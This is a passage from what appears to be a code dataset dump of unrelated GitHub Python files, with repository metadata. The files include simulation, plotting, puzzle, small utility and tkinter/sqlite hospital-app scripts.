\"cf_di_2\": # 'working di 2' parameters\n\t\t\tself.pi_max = 1.5 # 0.05 \n\t\t\tself.kp = 0.025 # 0.01 \n\t\t\tself.kv = 1.0 # 2.0 \n\t\t\tself.cbf_kp = 0.035 # 0.5\n\t\t\tself.cbf_kd = 0.5 # 2.0\t\t\t \n\t\tself.Delta_R = 2*(0.5*0.05 + 0.5**2/(2*2.0))\n\t\tself.epsilon = 0.01\n\n\t\t# imitation learning param (IL)\n\t\tself.il_load_loader_on = False\n\t\tself.training_time_downsample = 50 #10\n\t\tself.il_train_model_fn = '../models/doubleintegrator/il_current.pt'\n\t\tself.il_imitate_model_fn = '../models/doubleintegrator/rl_current.pt'\n\t\tself.il_load_dataset_on = True\n\t\tself.il_test_train_ratio = 0.85\n\t\tself.il_batch_size = 4096*8\n\t\tself.il_n_epoch = 5\n\t\tself.il_lr = 1e-3\n\t\tself.il_wd = 0 #0.0002\n\t\tself.il_n_data = None # 100000 # 100000000\n\t\tself.il_log_interval = 1\n\t\tself.il_load_dataset = ['orca','centralplanner'] # 'random','ring','centralplanner'\n\t\tself.il_controller_class = 'Barrier' # 'Empty','Barrier',\n\t\tself.il_pretrain_weights_fn = None # None or path to *.tar file\n\t\t\n\t\t# dataset param\n\t\t# ex: only take 8 agent cases, stop after 10K points \n\t\tself.datadict = dict()\n\t\tself.datadict[\"8\"] = 10000 \n\n\t\t# plots\n\t\tself.vector_plot_dx = 0.25 \n\n\t\t# learning hyperparameters\n\t\tn,m,h,l,p = 4,2,64,16,16 # state dim, action dim, hidden layer, output phi, output rho\n\t\tself.il_phi_network_architecture = nn.ModuleList([\n\t\t\tnn.Linear(4,h),\n\t\t\tnn.Linear(h,h),\n\t\t\tnn.Linear(h,l)])\n\n\t\tself.il_phi_obs_network_architecture = nn.ModuleList([\n\t\t\tnn.Linear(4,h),\n\t\t\tnn.Linear(h,h),\n\t\t\tnn.Linear(h,l)])\n\n\t\tself.il_rho_network_architecture = nn.ModuleList([\n\t\t\tnn.Linear(l,h),\n\t\t\tnn.Linear(h,h),\n\t\t\tnn.Linear(h,p)])\n\n\t\tself.il_rho_obs_network_architecture = nn.ModuleList([\n\t\t\tnn.Linear(l,h),\n\t\t\tnn.Linear(h,h),\n\t\t\tnn.Linear(h,p)])\n\n\t\tself.il_psi_network_architecture = nn.ModuleList([\n\t\t\tnn.Linear(2*p+4,h),\n\t\t\tnn.Linear(h,h),\n\t\t\tnn.Linear(h,m)])\n\n\t\tself.il_network_activation = relu\n\n\t\t# plots\n\t\tself.vector_plot_dx = 0.3\n\n\ndef load_instance(param, env, instance):\n\n\timport yaml\n\tif instance:\n\t\twith open(instance) as map_file:\n\t\t\tmap_data = yaml.load(map_file,Loader=yaml.SafeLoader)\n\telse:\n\t\t# default\n\t\twith open(\"../results/doubleintegrator/instances/{}\".format(param.default_instance)) as map_file:\n\t\t# test map test dataset\n\t\t\tmap_data = yaml.load(map_file)\n\n\ts = []\n\tg = []\n\tfor agent in map_data[\"agents\"]:\n\t\ts.extend([agent[\"start\"][0] + 0.5, agent[\"start\"][1] + 0.5])\n\t\ts.extend([0,0])\n\t\tg.extend([agent[\"goal\"][0] + 0.5, agent[\"goal\"][1] + 0.5])\n\t\tg.extend([0,0])\n\n\tInitialState = namedtuple('InitialState', ['start', 'goal'])\n\ts0 = InitialState._make((np.array(s), np.array(g)))\n\n\tparam.n_agents = len(map_data[\"agents\"])\n\tenv.reset_param(param)\n\n\tenv.obstacles = map_data[\"map\"][\"obstacles\"]\n\tfor x in range(-1,map_data[\"map\"][\"dimensions\"][0]+1):\n\t\tenv.obstacles.append([x,-1])\n\t\tenv.obstacles.append([x,map_data[\"map\"][\"dimensions\"][1]])\n\tfor y in range(map_data[\"map\"][\"dimensions\"][0]):\n\t\tenv.obstacles.append([-1,y])\n\t\tenv.obstacles.append([map_data[\"map\"][\"dimensions\"][0],y])\n\n\treturn s0\n\n\ndef run_batch(param, env, instance, controllers):\n\ttorch.set_num_threads(1)\n\ts0 = load_instance(param, env, instance)\n\tfor name, controller in controllers.items():\n\t\tprint(\"Running simulation with \" + name)\n\n\t\tstates, observations, actions, step = run_sim(param, env, controller, s0, name=instance)\n\t\tresult = np.hstack((param.sim_times[0:step].reshape(-1,1), states[0:step]))\n\t\tbasename = os.path.splitext(os.path.basename(instance))[0]\n\t\tfolder_name = \"../results/doubleintegrator/{}\".format(name)\n\t\tif not os.path.exists(folder_name):\n\t\t\tos.mkdir(folder_name)\n\n\t\toutput_file = \"{}/{}.npy\".format(folder_name, basename)\n\t\twith open(output_file, \"wb\") as f:\n\t\t\tnp.save(f, result.astype(np.float32), allow_pickle=False)\n\nif __name__ == '__main__':\n\n\targs = parse_args()\n\tparam = DoubleIntegratorParam()\n\tenv = DoubleIntegrator(param)\n\n\tif args.il:\n\t\trun(param, env, None, None, args)\n\t\texit()\n\n\tcontrollers = {\n\t\t'current':torch.load(param.il_train_model_fn),\n\t\t# 'current_wapf': Empty_Net_wAPF(param,env,torch.load(param.il_train_model_fn)),\n\t\t# 'apf': Empty_Net_wAPF(param,env,GoToGoalPolicy(param,env)),\n\t\t# 'e2e' : torch.load('../results/doubleintegrator/exp1Barrier_0/il_current.pt'),\n\t\t# '2stage' : Empty_Net_wAPF(param,env,torch.load('../results/doubleintegrator/exp1Empty_0/il_current.pt')),\n\t}\n\n\ts0 = load_instance(param, env, args.instance)\n\n\tif args.batch:\n\t\tif args.controller:\n\t\t\tcontrollers = dict()\n\t\t\tfor ctrl in args.controller:\n\t\t\t\tname,kind,path = ctrl.split(',')\n\t\t\t\tif kind == \"EmptyAPF\":\n\t\t\t\t\tcontrollers[name] = Empty_Net_wAPF(param,env,torch.load(path))\n\t\t\t\telif kind == \"torch\":\n\t\t\t\t\tcontrollers[name] = torch.load(path)\n\t\t\t\telif kind == \"apf\":\n\t\t\t\t\tcontrollers[name] = Empty_Net_wAPF(param,env,GoToGoalPolicy(param,env))\n\t\t\t\telse:\n\t\t\t\t\tprint(\"ERROR unknown ctrl kind\", kind)\n\t\t\t\t\texit()\n\n\t\tif args.Rsense:\n\t\t\tparam.r_comm = args.Rsense\n\t\t\tparam.r_obs_sense = args.Rsense\n\t\tif args.maxNeighbors:\n\t\t\tparam.max_neighbors = args.maxNeighbors\n\t\t\tparam.max_obstacles = args.maxNeighbors\n\t\tenv.reset_param(param)\n\n\t\trun_batch(param, env, args.instance, controllers)\n\n\telif args.export:\n\t\tmodel = torch.load('/home/ben/projects/caltech/neural-pid/results/doubleintegrator/exp1Barrier_0/il_current.pt')\n\t\tmodel.export_to_onnx(\"IL\")\n\n\telse:\n\t\trun(param, env, controllers, s0, args)\n\n","repo_name":"bpriviere/glas","sub_path":"code/examples/run_doubleintegrator.py","file_name":"run_doubleintegrator.py","file_ext":"py","file_size_in_byte":6729,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"81"} +{"seq_id":"38296200631","text":"from EulerTools import is_prime\nfrom itertools import permutations\nimport matplotlib.pyplot as plt\n\n\n\ndef chart():\n plt.style.use('ggplot')\n\n x = some_primes()\n y = diff()\n\n plt.plot(x, y)\n\n plt.xlabel('Primes')\n plt.ylabel('diff')\n plt.show()\n\n\ndef some_primes():\n return [x for x in range(10**3, 10**4) if is_prime(x)]\n\n\ndef is_perm(n):\n res = sorted(list(str(n)))\n return res\n\n\ndef diff(n):\n res = [0]\n for i in range(1, len(n)):\n res.append(n[i] - n[i-1])\n return res\n\n\ndef some_perms(n):\n string = str(n)\n return set([int(''.join(x)) for x in permutations(string, 4) if x[0] != '0'])\n \n\ndef prime_perms():\n res = []\n primes = some_primes()\n for prime in primes:\n perms = some_perms(prime)\n sub_res = []\n for perm in perms:\n if perm in primes:\n sub_res.append(perm)\n if len(sub_res) >= 3:\n sub_res.sort()\n if sub_res not in res:\n res.append(sub_res)\n return res\n\n\ndef search():\n for nums in prime_perms():\n nums.reverse()\n # print(nums)\n for i in range(0, len(nums)-2):\n for j in range(i + 1, len(nums)-1):\n for k in range(j + 1, len(nums)-0):\n if nums[i] - nums[j] == nums[j] - nums[k]:\n print(nums[k], nums[j], nums[i])\n\n\nsearch() # == 2969 6299 9629\n\n","repo_name":"jayH4487/project_euler","sub_path":"49_prime_perms.py","file_name":"49_prime_perms.py","file_ext":"py","file_size_in_byte":1405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"35940801750","text":"import pickle\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport sys\n\nfrom matplotlib.colors import ListedColormap,LinearSegmentedColormap\ncolors = [\"darkorange\", \"gold\", \"lawngreen\", \"lightseagreen\",\"darkgreen\"]\ncmap_LOP = ListedColormap(colors)\n\n# colors = [\"black\", \"purple\", \"darkorange\",\"lawngreen\", \"gold\"]\n# nodes = np.linspace(0, 1, len(colors))\n# cmap_LOP = LinearSegmentedColormap.from_list(\"mycmap\", list(zip(nodes, colors)))\n\n\ndef plot_params():\n plt.rc('text', usetex=True)\n plt.rc('font', size=13)\n plt.rc('xtick', labelsize=11)\n plt.rc('ytick', labelsize=11)\n plt.rc('axes', labelsize=14)\n plt.rc('legend', fontsize=8)\n plt.rc('lines', linewidth=1.0)\n plt.rcParams[\"axes.formatter.limits\"] = (-3, 4)\n plt.rc('font', **{'family': 'serif', 'serif': ['Computer Modern']})\nplot_params()\n\ndef plot_LOP(t_phase_smp, lop, vizinhos, n):\n fig, ax2 = plt.subplots(ncols=1, nrows=1, figsize=(8,3),sharex=True)\n fig.set_tight_layout(20)\n fig.suptitle('$g_{ex}='+f'{gex}$ S/cm²' + ' | '+'$I='+f'{amp}$ nA'+ '\\n' +f'PopRate $={popRates:.2f}$Hz'+ ' | '+f'$r$: {float(r)}', fontsize=14)\n n_neurons = np.arange(lop.shape[1])\n t = t_phase_smp\n tg, ig = np.meshgrid(n_neurons, t)\n hm2 = ax2.pcolor(ig, tg, lop, cmap=cmap_LOP, vmax=1.0, vmin=0.)#cmap_LOP)\n\n cbar2= plt.colorbar(hm2, ax=ax2, ticks=[0, 1])\n cbar2.ax.set_yticklabels(['0.9', '1,0']) \n cbar2.set_label('LOP$(t)$')\n ax2.set_title('$\\delta='+f'{vizinhos}'+'$')\n ax2.set_ylabel('$n$ neurônio')\n ax2.set_ylim(0,len(n_neurons))\n ax2.set_xlabel('Tempo (ms)')\n # ax2.set_xlim(5000, 6000)\n plt.savefig(file+f'_PlotLOP_{gex}_{amp}_{vizinhos}_({n}).png', dpi=600, bbox_inches='tight')\n\nv = str(sys.argv[1])\nbatch = sys.argv[2]\nbatch_number = 'batch'+str(batch.zfill(4))\nsubbatch = sys.argv[3]\nsubbatch_number = '0_'+str(subbatch)\n\nfile = f'../data/v{v}_{batch_number}/v{v}_{batch_number}_{subbatch_number}'\n# file = f'../data/v6_batch0001/v6_batch0001_0_1'\n\nprint('\\n~~ Plot LOP ')\nprint(f'Reading: \"{file}\"')\nwith open(file + '_data.pkl', 'rb') as f:\n data = pickle.load(f)\n\ngex = data['simConfig']['gex']\namp = data['simConfig']['IClamp0']['amp']\nn_neighbors = data['simConfig']['n_neighbors']\ncellNumber = data['simConfig']['cellNumber']\nr = n_neighbors / cellNumber\npopRates = data['simData']['popRates']['sPY']\n\nlops = data['LOP_delta']\nt_phase = data['t_phase']\n\nti1 = int(0.1*len(t_phase))\nti2 = int(0.5*len(t_phase))\ntf = int(len(t_phase))\n\n\nfor delta, lop in lops.items():\n print(f'--> Plot LOP: delta = {delta}')\n plot_LOP(t_phase[ti1:tf], lop[ti1:tf,:], vizinhos=delta, n=1)\n plot_LOP(t_phase[ti1:ti2], lop[ti1:ti2,:], vizinhos=delta, n=2)\n\nprint('\\n~~')\n\n\n\n","repo_name":"FernandoSBorges/chimeras","sub_path":"sim/plotLOP.py","file_name":"plotLOP.py","file_ext":"py","file_size_in_byte":2719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"3387279689","text":"cost = 1\ntotalCost = 0\n\n\nprint(\"Input prices. Enter 0 to indicate that you are done entering.\")\n\n\nwhile cost != 0:\n strCost = raw_input(\"Enter the cost of the item: \")\n\n cost = float(strCost)\n\n totalCost += cost\nelse:\n\n print (\"The total is $\" + str(totalCost))\n\n\nstrTax = raw_input(\"How much will you be taxed? Enter whole numbers, I will treat it as a percent: \")\n\n\nsales_tax = float(strTax) / 100\n\n\ntotal = totalCost * sales_tax\nprint(\"You will be taxed \" + strTax + \"%\")\n\nprint(\"That is $\" + str(round(total, 2)))\ngrandTotal = float(total) + totalCost\n\nprint(\"The total cost, with tax, is: $\" + str(round(grandTotal, 2)))\n\n","repo_name":"Gijoe614/Sales_tax","sub_path":"Sales-tax.py","file_name":"Sales-tax.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"38010288510","text":"# def add_and_print (a, b, c) : #add_and_print is the name of function # (a, b, c)= parameter (there are 3 parameters)\r\n# result = a + b + c\r\n# print(result) #(result) is an argument \r\n\r\n# x = 13.2 \r\n# y = 21.4 \r\n# z = 90\r\n\r\n# add_and_print(x, y, z) #there has to be the same # of arguments and parameters # (x, y, z) = arguments (3 arguments) \r\n\r\ndef add_and_print (a, b, c) : \r\n result = a + b + c \r\n return result\r\n\r\nx = float(input('Enter first number : '))\r\ny = float(input('Enter second number : '))\r\nz = float(input('Enter third number : '))\r\n\r\nprint(add_and_print(x, y, z)) ","repo_name":"Hannah0824/Python-","sub_path":"Python/Week1/4_Function.py","file_name":"4_Function.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"41181916955","text":"import unittest\nimport subprocess\nimport goenrich\n\nclass TestGoenrich(unittest.TestCase):\n\n def test_analysis_and_export(self):\n O = goenrich.obo.ontology('db/go-basic.obo')\n gene2go = goenrich.read.gene2go('db/gene2go.gz')\n values = {k: set(v) for k,v in gene2go.groupby('GO_ID')['GeneID']}\n background_attribute = 'gene2go'\n goenrich.enrich.propagate(O, values, background_attribute)\n query = gene2go['GeneID'].unique()[:20]\n try:\n import pygraphviz\n goenrich.enrich.analyze(O, query, background_attribute, gvfile='test.dot')\n subprocess.check_call(['dot', '-Tpng', 'test.dot', '-o', 'test.png'])\n subprocess.check_call(['rm', 'test.dot', 'test.png'])\n except ImportError:\n goenrich.enrich.analyze(O, query, background_attribute)\n print('pygraphviz could not be imported')\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"WenchaoLin/goenrich","sub_path":"goenrich/tests/test_enrichment.py","file_name":"test_enrichment.py","file_ext":"py","file_size_in_byte":948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"81"} +{"seq_id":"27175877906","text":"#!/usr/bin/env python3\n\"\"\"\n2019-03-01 Hashing Assignment\n\"\"\"\n\nimport logging\nfrom itertools import chain\nfrom typing import NamedTuple, List, Iterator\n\n\nclass Entry(NamedTuple):\n present_as_positive_value: bool\n present_as_negative_value: bool\n\n\nclass TrivialSet:\n def __init__(self, max_range: int):\n self.array: List[Entry] = [Entry(present_as_positive_value=False, present_as_negative_value=False)\n for _ in range(max_range + 1)]\n\n def add(self, item):\n present_as_positive_value, present_as_negative_value = self.array[item]\n if item >= 0:\n present_as_positive_value = True\n else:\n present_as_negative_value = True\n self.array[abs(item)] = Entry(present_as_positive_value, present_as_negative_value)\n\n def discard(self, item):\n present_as_positive_value, present_as_negative_value = self.array[item]\n if item >= 0:\n present_as_positive_value = False\n else:\n present_as_negative_value = False\n self.array[abs(item)] = Entry(present_as_positive_value, present_as_negative_value)\n\n def __contains__(self, item):\n if item >= 0:\n return self.array[abs(item)].present_as_positive_value\n else:\n return self.array[abs(item)].present_as_negative_value\n\n def __iter__(self) -> Iterator[int]:\n negative_items = (-index for index, entry in enumerate(self.array) if entry.present_as_negative_value)\n positive_items = (index for index, entry in enumerate(self.array) if entry.present_as_positive_value)\n\n return chain(negative_items, positive_items)\n\n def __str__(self):\n return '{%s}' % ', '.join(map(str, iter(self)))\n\n def __repr__(self):\n return f'{self.__class__.__name__}({str(self)})'\n\n\nif __name__ == '__main__':\n import argparse\n import sys\n from random import randint\n\n parser = argparse.ArgumentParser(description='Sort a random array')\n parser.add_argument('--max-range', metavar='MAX', type=int, default=10)\n parser.add_argument('--test-count', metavar='MAX', type=int, default=10)\n args = parser.parse_args()\n\n logging.basicConfig(level=logging.DEBUG, stream=sys.stdout)\n\n trivial_set = TrivialSet(max_range=args.max_range)\n\n for _ in range(args.max_range):\n num = randint(-args.max_range, args.max_range)\n logging.debug(f'Adding value: {num}')\n trivial_set.add(num)\n logging.debug(f'Set after add: {trivial_set}')\n","repo_name":"0x326/academic-code-portfolio","sub_path":"2016-2021 Miami University/CSE 564 Algorithms/Coding Assignments/src/hashing.py","file_name":"hashing.py","file_ext":"py","file_size_in_byte":2516,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"15691727129","text":"\n'''\ndice simulator\nauthor: Samson Wang\ndata: 2018-04-16\n'''\n\nimport random\n\n# 最大最小值\nnum_min = 1\nnum_max = 6\n\nis_need_exit = False\n\nwhile not is_need_exit :\n\tprint(\"==dice simulator==\")\n\tprint(\"dice is rolling!\\n min=%d, max=%d\" % (num_min, num_max))\n\tnum_rand = random.randint(num_min, num_max)\n\tprint(\" rand number\", num_rand)\n\n\t# ask whether next roll is needed\n\twhile True:\n\t\tanswer = input(\"roll dice again? (y/n): \")\n\t\tif (answer == \"n\") :\n\t\t\tis_need_exit = True\n\t\t\tbreak;\n\t\telif (answer == \"y\") :\n\t\t\tis_need_exit = False\n\t\t\tbreak;\n\t\telse :\n\t\t\tprint(\"please input \\\"y\\\" or \\\"n\\\" !!\")\n\t\t\n\t\n\n\n","repo_name":"samsonwang/ToyPython","sub_path":"PlayGround/01DiceSimulator/01DiceSimulator.py","file_name":"01DiceSimulator.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"42405756757","text":"'''\n https://leetcode.com/problems/detect-squares/\n\n 2013. Detect Squares\n\n You are given a stream of points on the X-Y plane. Design an algorithm that:\n - Adds new points from the stream into a data structure. Duplicate points are allowed and should be treated as different points.\n - Given a query point, counts the number of ways to choose three points from the data structure such that the three points and the query point form an axis-aligned square with positive area.\n An axis-aligned square is a square whose edges are all the same length and are either parallel or perpendicular to the x-axis and y-axis.\n\n Implement the DetectSquares class:\n\n - DetectSquares() Initializes the object with an empty data structure.\n - void add(int[] point) Adds a new point point = [x, y] to the data structure.\n - int count(int[] point) Counts the number of ways to form axis-aligned squares with point point = [x, y] as described above.\n'''\n\n'''\n Before adding memo, it was correct by TLE. After adding memo, it got accepted.\n'''\n\n\nclass DetectSquares:\n xCoordMap = None\n yCoordMap = None\n pointsCounts = None\n\n def __init__(self):\n self.xCoordMap = {}\n self.yCoordMap = {}\n self.pointsCounts = {}\n\n def add(self, point: [int]) -> None:\n xCoord, yCoord = point[0], point[1]\n\n if xCoord not in self.xCoordMap:\n self.xCoordMap[xCoord] = []\n\n self.xCoordMap[xCoord].append((xCoord, yCoord))\n\n if yCoord not in self.yCoordMap:\n self.yCoordMap[yCoord] = []\n\n self.yCoordMap[yCoord].append((xCoord, yCoord))\n\n if (xCoord, yCoord) not in self.pointsCounts:\n self.pointsCounts[(xCoord, yCoord)] = 0\n\n self.pointsCounts[(xCoord, yCoord)] += 1\n\n def count(self, point: [int]) -> int:\n xCoord, yCoord = point[0], point[1]\n\n # first we need to find all the points with same xCoord as the point\n # and all the points with the same yCoord as the point\n if xCoord in self.xCoordMap and yCoord in self.yCoordMap:\n xCoordPoints = self.xCoordMap[xCoord]\n yCoordPoints = self.yCoordMap[yCoord]\n\n # now we need to find which of the xCoordPoints and yCoordPoints are equidistant from our point\n xCoordDistances = {}\n yCoordDistances = {}\n\n for otherPoint in xCoordPoints:\n # the distance from (xCoord, yCoord) and a point in xCoordPoints is equal to abs(yCoord and otherYCoord)\n distance = int(abs(otherPoint[1] - yCoord))\n\n if distance not in xCoordDistances:\n xCoordDistances[distance] = []\n\n xCoordDistances[distance].append(otherPoint)\n\n for otherPoint in yCoordPoints:\n # the distance from (xCoord, yCoord) and a point in yCoordPoints is equal to abs(xCoord and otherXCoord)\n distance = int(abs(otherPoint[0] - xCoord))\n\n if distance not in yCoordDistances:\n yCoordDistances[distance] = []\n\n yCoordDistances[distance].append(otherPoint)\n\n # counts the total number of squares that can be formed from given point\n totalSquares = 0\n\n # because there could be duplicate points, maybe if we've already seen the point p1 before, we can memorize\n # its results instead of recomputing for every p2\n memo = {}\n\n # now that we mapped every other point to its distance from our point, we need to check all the points in xCoordDistances\n # and yCoordDistances that have same distance from our point\n for distance in xCoordDistances:\n if distance in yCoordDistances:\n # get these pairs together and see if they can form a square\n for p1 in xCoordDistances[distance]:\n if p1 in memo:\n totalSquares += memo[p1]\n else:\n memo[p1] = 0\n\n for p2 in yCoordDistances[distance]:\n fourthPoint = None\n\n # first we need to see in which quadrant with point in its center are we attempting to create the triangle\n if p2[0] < xCoord and p1[1] > yCoord:\n # quadrant 1 => look for (i-d, j+d)\n fourthPoint = (xCoord - distance, yCoord + distance)\n elif p2[0] > xCoord and p1[1] > yCoord:\n # quadrant 2 => look for (i+d, j+d)\n fourthPoint = (xCoord + distance, yCoord + distance)\n elif p2[0] > xCoord and p1[1] < yCoord:\n # quadrant 3 => look for (i+d, j-d)\n fourthPoint = (xCoord + distance, yCoord - distance)\n elif p2[0] < xCoord and p1[1] < yCoord:\n # quadrant 4 => look for (i-d, j-d)\n fourthPoint = (xCoord - distance, yCoord - distance)\n\n if fourthPoint is not None and fourthPoint in self.pointsCounts:\n totalSquares += self.pointsCounts[fourthPoint]\n memo[p1] += self.pointsCounts[fourthPoint]\n\n return totalSquares\n else:\n return 0\n\n\n# Your DetectSquares object will be instantiated and called as such:\nobj = DetectSquares()\n\n# commands = [\"add\", \"add\", \"add\", \"count\", \"count\", \"add\", \"count\"]\n# input = [[[3, 10]], [[11, 2]], [[3, 2]], [[11, 10]], [[14, 8]], [[11, 2]], [[11, 10]]]\n\n# commands = [\"count\"]\n# input = [[[11, 10]]]\n\ncommands = [\"add\", \"add\", \"add\"]\ninput = [[[3, 10]], [[11, 2]], [[3, 2]]]\n\nfor i in range(0, len(commands)):\n command = commands[i]\n\n if command == \"add\":\n obj.add(input[i][0])\n elif command == \"count\":\n print(obj.count(input[i][0]))\n","repo_name":"hnc01/online-judge","sub_path":"LeetCode/top_google/medium/detect_squares.py","file_name":"detect_squares.py","file_ext":"py","file_size_in_byte":6138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"33633015773","text":"import tensorflow as tf\nfrom typing import Tuple\n\n\n\nclass GCNSkipLayer(tf.keras.layers.Layer):\n def __init__(self, units: int, activation=None, kernel_initializer=\"glorot_uniform\", dtype=tf.float32):\n super(GCNSkipLayer, self).__init__(dtype=dtype)\n\n self.units = int(units)\n self.activation = tf.keras.activations.get(activation)\n self.kernel_initializer = tf.keras.initializers.get(kernel_initializer)\n\n def build(self, input_shape):\n last_dim_nodes = tf.TensorShape(input_shape[1])[-1]\n last_dim_skip = tf.TensorShape(input_shape[2])[-1]\n\n self.kernel_nodes = self.add_weight(\n 'kernel_nodes',\n shape=[last_dim_nodes, self.units],\n initializer=self.kernel_initializer,\n dtype=self.dtype,\n trainable=True)\n self.kernel_skip = self.add_weight(\n 'kernel_skip',\n shape=[last_dim_skip, self.units],\n initializer=self.kernel_initializer,\n dtype=self.dtype,\n trainable=True)\n self.built = True\n\n def call(self, inputs: Tuple[tf.SparseTensor,tf.Tensor,tf.Tensor], training=None, mask=None):\n adj, nodes, skip_input = inputs\n kernel_branch = tf.matmul(tf.sparse.sparse_dense_matmul(adj,nodes),self.kernel_nodes)\n skip_branch = tf.matmul(skip_input,self.kernel_skip)\n return self.activation(kernel_branch + skip_branch)","repo_name":"Rufaim/EvolveGCN","sub_path":"models/layers/gcn_skip_layer.py","file_name":"gcn_skip_layer.py","file_ext":"py","file_size_in_byte":1422,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"81"} +{"seq_id":"3370860098","text":"import os\r\nimport csv\r\n\r\n\r\nprint(\"Create a new folder? y/n: \")\r\nanswer = input()\r\nif (answer == \"y\"):\r\n print(\"Enter the name of a folder: \")\r\n folder_name_input = input()\r\n\r\n current_directory = os.getcwd()\r\n path = current_directory + f\"\\\\{folder_name_input}\"\r\n\r\n if not os.path.exists(path):\r\n os.makedirs(path)\r\n\r\n file_name = \"user_folder_data.csv\"\r\n csv_path = path + f\"\\\\{file_name}\"\r\n\r\n if not os.path.exists(csv_path):\r\n # If the file doesn't exist, create a new one with a header row\r\n with open(csv_path, 'w', newline='') as file:\r\n writer = csv.writer(file)\r\n writer.writerow(['item_name'])\r\n\r\n # Check if 'item_name' row exists\r\n item_name_exists = False\r\n with open(csv_path, 'r', newline='') as file:\r\n reader = csv.reader(file)\r\n header = next(reader, None)\r\n if header:\r\n for column in header:\r\n if column == 'item_name':\r\n item_name_exists = True\r\n break\r\n\r\n print(\"Add an item? y/n: \")\r\n answer = input()\r\n if answer == \"y\":\r\n with open(csv_path, 'a', newline='') as file:\r\n writer = csv.writer(file)\r\n if not item_name_exists:\r\n writer.writerow(['item_name'])\r\n print(\"Enter the name of an item: \")\r\n user_input = input()\r\n writer.writerow([user_input])\r\n","repo_name":"02Ken20/Suadeo","sub_path":"FolderSystem.py","file_name":"FolderSystem.py","file_ext":"py","file_size_in_byte":1422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"74179389386","text":"\"\"\" \nScript to check for non-legal Unicode-IPA characters.\n\nFor use with Python version 3 or greater.\n\n\"\"\"\n\nclass UnicodeIpaTester:\n def __init__(self):\n self.hash = {}\n self.data = open(\"unicode_ipa.csv\", \"r\")\n header = self.data.readline()\n for line in self.data:\n line = line.strip()\n tokens = line.split(\"\\t\")\n decimal = tokens[2].strip()\n decimal = int(decimal)\n if not decimal in self.hash:\n self.hash[decimal] = 1\n else:\n self.hash[decimal] += 1\n\n def compare(self, inputhash):\n c = 0\n for k, v in inputhash.items():\n if not k in self.hash:\n print(\"NON-IPA: \", k, v, chr(k))\n c += 1\n if not c == 0:\n print(\"total: \", c)\n\n def compare_string(self, decimal):\n if not decimal in self.hash:\n return decimal\n\nif __name__==\"__main__\":\n import sys, unicodedata\n uipa = UnicodeIpaTester()\n # uipa.compare({58:1, 76:1, 77:1, 7725:2})\n\n test_hash = {}\n file = open(sys.argv[1], \"r\")\n for line in file:\n line = line.strip()\n if line.startswith(\"#\"):\n continue\n\n for char in line:\n if char == \" \":\n continue\n if not char == \"\":\n decimal = uipa.compare_string(ord(char))\n if not decimal == None:\n # print(\"NON-IPA: \", decimal, chr(decimal))\n if not decimal in test_hash:\n test_hash[decimal] = 1\n else:\n test_hash[decimal] += 1\n\n if len(test_hash) == 0:\n print(\"\\nHooray! No illegal Unicode IPA characters were found in the input: \"+sys.argv[1]+\"\\n\")\n else:\n print(\"\\nThe following table lists the illegal Unicode IPA characters found in the input: \"+sys.argv[1]+\"\\n\")\n print(\"Decimal\"+\"\\t\"+\"Glyph\"+\"\\t\"+\"Occurrences\") \n for k, v in test_hash.items():\n print(str(k)+\"\\t\"+chr(k)+\"\\t\"+str(v))\n print(\"\\n\")\n","repo_name":"bambooforest/unicodeipa","sub_path":"check_unicode_ipa.py","file_name":"check_unicode_ipa.py","file_ext":"py","file_size_in_byte":2093,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"23420791060","text":"#armaan 2110994755\nfrom tkinter import *\nimport tkinter.messagebox #importing librariries such as messagebox used for displaying messages\nimport sqlite3\nfrom PIL import ImageTk,Image #ImageTk module contains support to create and modify Tkinter BitmapImage and PhotoImage objects from\n#PIL images used everywhere Tkinter expects an image object\nconn = sqlite3.connect('database1.db')\nc = conn.cursor()\n#this file is created so that the user can update the data in accordance to their need if they feel it needs to be edited\nclass Application:\n def __init__(self, master):\n self.master = master\n self.image=ImageTk.PhotoImage(Image.open(\"hospital5.jpg\"))\n self.panel=Label(master,image=self.image)\n self.panel.pack()\n self.heading = Label(master, text=\"Update Appointments\", fg='steelblue', font=('arial 40 bold'))\n self.heading.place(x=150, y=0)\n\n self.name = Label(master, text=\"Enter Patient's Name\", font=('arial 18 bold'))\n self.name.place(x=0, y=80)\n\n self.namenet = Entry(master, width=30,bd=3) #user inputs the name to search for the data base\n self.namenet.place(x=280, y=80)\n#search button enables the searching of the data base in accordance to the name \n self.search = Button(master, text=\"Search\", width=12, height=1, bg='steelblue',bd=3,command=self.search_db)\n self.search.place(x=330, y=120)\n\n\n def search_db(self):\n self.input = self.namenet.get() #taking the user input for the name by the patient\n\n sql = \"SELECT * FROM appointment WHERE name LIKE ?\" #select sql query used and stored in the sql variable\n self.res = c.execute(sql, (self.input,))\n for self.row in self.res:\n self.name1 = self.row[1]\n self.age = self.row[2]\n self.gender = self.row[3]\n self.address = self.row[4]\n self.phone = self.row[5]\n self.time = self.row[6]\n#label used for displaying the name, age gender etc when the patient searches \n self.uname = Label(self.master, text=\"Patient's Name\", font=('arial 18 bold'))\n self.uname.place(x=0, y=150)\n\n self.uage = Label(self.master, text=\"Age\", font=('arial 18 bold'))\n self.uage.place(x=0, y=190)\n\n self.ugender = Label(self.master, text=\"Gender\", font=('arial 18 bold'))\n 